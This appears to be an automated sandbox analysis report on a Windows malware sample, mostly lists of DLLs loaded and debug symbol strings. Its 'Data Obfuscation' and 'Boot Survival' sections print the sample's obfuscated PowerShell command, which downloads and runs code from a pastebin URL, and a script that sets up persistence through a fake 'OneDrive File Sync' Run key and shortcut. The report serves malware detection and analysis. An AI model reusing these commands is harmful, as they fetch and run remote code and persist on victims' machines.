Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.0.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb< source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb4000052534131000400000100010007d1fa57c4aed9f0a32e84aa0faefd0de9e8fd6aec8f87fb03766c834c99921eb23be79ad9d5dcc1dd9ad236132102900b723cf980957fc4e177108fc607774f29e8320e92ea05ece4e821c0a5efe8f1645c4c0c93c1ab99285d622caa652c1dfad63d745d6f2de5f17e5eaf0fc4 source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdb& source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbR, source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbP/,K source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1864209009.000002019A767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1941161276.00000201B4A00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdbi source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb6K source: powershell.exe, 0000000C.00000002.1943252359.00000201B4A11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdlll source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1872900029.000001D4FB210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1873629350.000001D4FB250000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.1872900029.000001D4FB210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000007.00000002.1874241458.000001D4FB286000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1943392524.00000201B4A1D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb1934e089$ source: powershell.exe, 0000000C.00000002.1941161276.00000201B4A00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbvice source: powershell.exe, 0000000C.00000002.1941161276.00000201B4992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CRYPT_DEBUG_FORCE_FREE_LIBRARY.pdb! source: powershell.exe, 00000007.00000002.1876379693.000001D4FB2EE000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B0600BD pushad ; iretd 0_2_00007FFB4B0600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B06812B push ebx; ret 0_2_00007FFB4B06816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4B1103CA pushad ; retf 7_2_00007FFB4B1103CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4B1159EE push ds; retf 7_2_00007FFB4B115A0F

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = 